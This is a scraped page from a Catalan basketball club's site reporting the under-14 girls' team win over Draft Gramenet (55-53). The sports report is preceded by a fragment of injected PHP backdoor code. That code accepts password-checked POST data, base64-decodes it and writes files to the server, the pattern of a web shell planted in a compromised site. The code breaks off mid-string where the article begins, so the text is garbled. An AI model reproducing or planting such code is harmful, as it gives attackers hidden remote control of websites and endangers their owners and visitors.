function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení 07 A es refà d'un mal tercer quart, imposa un alt ritme de joc i derrota el Draft (55-53) - Tgn Bàsquet Club -

L’infantil femení 07 A es refà d’un mal tercer quart, imposa un alt ritme de joc i derrota el Draft (55-53)

Updated: octubre 15, 2019

L’infantil femení 07 A va aconseguir una victòria molt valuosa (i molt treballada) contra el Draft Gramenet. L’equip que entrena Manuel Rubio va fer un bon inici de partit, amb un alt ritme de joc, sense treva, però la falta d’encert li va impedir acoseguir un avantatge definitiu per afrontar la segona meitat (28-19). En el tercer quart, però, el TGN Bàsquet va cometre moltes errades, amb contínues pèrdues de pilota que van provocar la remuntada del conjunt visitant. Tot i el cop moral que suposava veure’s per sota en el marcador després d’haver fet un bon partit, les liles es van refer, van recuperar el seu millor joc i es van endur el triomf tot i que el Draft Gramenet hauria pogut forçar la pròrroga en l’últim sospir.